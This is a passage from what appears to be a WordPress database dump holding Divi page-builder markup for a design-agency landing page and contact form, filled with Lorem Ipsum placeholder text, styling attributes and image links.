button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Message\" field_title=\"Message\" field_type=\"text\" fullwidth_field=\"on\" _builder_version=\"3.16\" custom_margin=\"||60px|\" custom_padding=\"|||\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][/et_pb_contact_form][/et_pb_column][/et_pb_row][/et_pb_section]','BLOG','','inherit','closed','closed','','221-revision-v1','','','2020-07-06 17:17:46','2020-07-06 17:17:46','',221,'https://52.66.212.87/2020/07/06/221-revision-v1/',0,'revision','',0),(226,1,'2020-07-28 21:37:31','0000-00-00 00:00:00','<!-- wp:elfsight-whatsapp-chat/block {\"id\":\"1\",\"exist\":true} /-->','LANDING PAGE','','draft','closed','closed','','','','','2020-07-28 21:37:31','2020-07-28 21:37:31','',0,'https://52.66.212.87/?page_id=226',0,'page','',0),(227,1,'2020-07-06 17:24:04','2020-07-06 17:24:04','<!-- wp:divi/placeholder /-->','LANDING PAGE','','inherit','closed','closed','','226-revision-v1','','','2020-07-06 17:24:04','2020-07-06 17:24:04','',226,'https://52.66.212.87/2020/07/06/226-revision-v1/',0,'revision','',0),(229,1,'2020-07-06 17:26:28','2020-07-06 17:26:28','[et_pb_section fb_built=\"1\" admin_label=\"Hero\" _builder_version=\"3.22\" custom_padding=\"0px|0px|0px|0px\" animation_style=\"zoom\" animation_intensity_zoom=\"4%\"][et_pb_row use_custom_gutter=\"on\" gutter_width=\"1\" make_equal=\"on\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"3.25\" background_color=\"#fcd21d\" background_image=\"https://52.66.212.87/wp-content/uploads/2020/07/circle-background-pattern.png\" width=\"100%\" width_tablet=\"100%\" width_last_edited=\"on|desktop\" max_width=\"100%\" max_width_tablet=\"100%\" max_width_last_edited=\"on|desktop\" custom_padding=\"0px||0px|\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"3%\" make_fullwidth=\"on\" column_structure=\"1_2,1_2\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"10%|8%|10%|8%\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"Montserrat|500||on|||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_letter_spacing=\"3px\" custom_margin=\"||45px|\" animation_style=\"slide\" animation_direction=\"bottom\" locked=\"off\"]We are a full service\r[/et_pb_text][et_pb_text _builder_version=\"3.27.4\" text_font=\"||||||||\" header_font=\"Montserrat|700||on|||||\" header_text_color=\"#f7f7f7\" header_font_size=\"60px\" header_line_height=\"1.3em\" custom_margin=\"||40px|\" animation_style=\"fade\" header_font_size_last_edited=\"off|desktop\" locked=\"off\"]<h1>Creative <br /><span style=\"color: #353740;\">Design Agency</span></h1>[/et_pb_text][et_pb_text _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"20px\" text_line_height=\"1.8em\" header_font=\"||||||||\" custom_margin=\"||50px|\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"17%\" locked=\"off\"]It is a long established fact that a reader will be distracted by the readable content of a page when looking at its layout. The point of using Lorem Ipsum is that it has normal.\r[/et_pb_text][et_pb_button button_text=\"Learn More\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"4px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" animation_style=\"fade\" button_text_color_hover=\"#ffffff\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" locked=\"off\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#ffffff\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#ffffff\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" background_image=\"https://52.66.212.87/wp-content/uploads/2020/07/business_01.jpg\" parallax=\"on\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Service Section\" _builder_version=\"3.22\" custom_margin=\"|||\" custom_padding=\"110px||110px|\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>What we do</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.</p>\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\" column_structure=\"1_3,1_3,1_3\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"UX Research\" use_icon=\"on\" font_icon=\"%%74%%\" icon_color=\"#fcd21d\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"3.0.87\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text.\r[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Brand Identity\" use_icon=\"on\" font_icon=\"%%103%%\" icon_color=\"#fcd21d\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"3.0.87\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text.\r[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Web Development\" use_icon=\"on\" font_icon=\"%%107%%\" icon_color=\"#fcd21d\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"3.0.87\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text.\r[/et_pb_blurb][/et_pb_column][/et_pb_row][et_pb_row use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\" column_structure=\"1_3,1_3,1_3\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Business Strategy\" use_icon=\"on\" font_icon=\"%%101%%\" icon_color=\"#fcd21d\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"3.0.87\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text.\r[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Web Design\" use_icon=\"on\" font_icon=\"%%106%%\" icon_color=\"#fcd21d\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"3.0.87\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text.\r[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Photography\" use_icon=\"on\" font_icon=\"%%108%%\" icon_color=\"#fcd21d\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"3.0.87\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text.\r[/et_pb_blurb][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Video Section\" _builder_version=\"3.22\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"#fcd21d\" background_color_gradient_start_position=\"65%\" background_color_gradient_end_position=\"65%\" custom_padding=\"|||\"][et_pb_row admin_label=\"Video\" _builder_version=\"3.25\" custom_padding=\"0px|0px|0px|0px\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"4%\" animation_starting_opacity=\"100%\" box_shadow_style=\"preset1\" box_shadow_blur=\"77px\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_video src=\"https://www.youtube.com/watch?v=1ALjCZkKuUM\" image_src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-01.jpg\" _builder_version=\"3.0.83\" animation_direction=\"bottom\" box_shadow_style=\"preset5\" box_shadow_vertical=\"0px\" box_shadow_spread=\"20px\" box_shadow_color=\"#ffffff\"][/et_pb_video][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Fun Fact Section\" _builder_version=\"3.22\" background_color=\"#fcd21d\" custom_margin=\"|||\" custom_padding=\"60px||110px|\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Generating New Ideas. Solving Big Problems</h2>\r[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.</p>\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"Fun Fact\" _builder_version=\"3.25\" custom_margin=\"|||\" custom_padding=\"40px||40px|\" animation_style=\"zoom\" animation_direction=\"top\" animation_intensity_zoom=\"10%\" column_structure=\"1_4,1_4,1_4,1_4\"][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Projects\" number=\"200\" percent_sign=\"off\" _builder_version=\"3.0.83\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Satisfied Clients\" number=\"54\" percent_sign=\"off\" _builder_version=\"3.0.83\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"100ms\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Ongoing Projects\" number=\"12\" percent_sign=\"off\" _builder_version=\"3.0.83\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"200ms\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Cups Of Coffee\" number=\"906\" percent_sign=\"off\" _builder_version=\"3.0.83\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"300ms\"][/et_pb_number_counter][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Feature Section\" _builder_version=\"3.22\" custom_margin=\"|||\" custom_padding=\"109px||110px|\"][et_pb_row use_custom_gutter=\"on\" gutter_width=\"4\" admin_label=\"Feature\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"3.25\" width=\"86%\" width_tablet=\"80%\" width_last_edited=\"on|desktop\" max_width=\"86%\" max_width_tablet=\"80%\" max_width_last_edited=\"on|desktop\" custom_padding=\"40px||40px|\" make_fullwidth=\"on\" column_structure=\"1_2,1_2\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-07-1.png\" force_fullwidth=\"on\" align_tablet=\"center\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"8%\" animation_starting_opacity=\"100%\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"7%||7%|\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" max_width=\"700px\" module_alignment=\"left\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" locked=\"off\"]<h2>Why we are different</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" locked=\"off\"]<p>Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make point of using a type specimen book.</p>[/et_pb_text][et_pb_button button_url=\"#\" button_text=\"Learn More\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Latest Work Section\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" custom_padding=\"110px||5px|\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Our Latest Work</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.</p>\r[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" make_equal=\"on\" use_custom_gutter=\"on\" gutter_width=\"1\" specialty=\"on\" padding_top_1=\"0px\" admin_label=\"Work Section\" module_class=\" et_pb_specialty_fullwidth\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" inner_width=\"100%\" inner_width_tablet=\"100%\" inner_width_last_edited=\"on|desktop\" inner_max_width=\"100%\" inner_max_width_tablet=\"100%\" inner_max_width_last_edited=\"on|desktop\" custom_padding=\"0px|5%|0px|5%\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_top__hover=\"0px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-02.jpg\" url=\"#\" force_fullwidth=\"on\" align_tablet=\"center\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" specialty_columns=\"2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_row_inner _builder_version=\"3.25\" custom_padding=\"0px||0px|\"][et_pb_column_inner saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-03.jpg\" url=\"#\" force_fullwidth=\"on\" align_tablet=\"center\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner _builder_version=\"3.25\" custom_padding=\"0px||0px|\" column_structure=\"1_2,1_2\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-05.jpg\" url=\"#\" align_tablet=\"center\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-04-1.jpg\" url=\"#\" align_tablet=\"center\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][/et_pb_row_inner][/et_pb_column][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Button Section\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" custom_padding=\"0px||90px|\"][et_pb_row _builder_version=\"3.25\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_button button_url=\"#\" button_text=\"See More\" button_alignment=\"center\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" 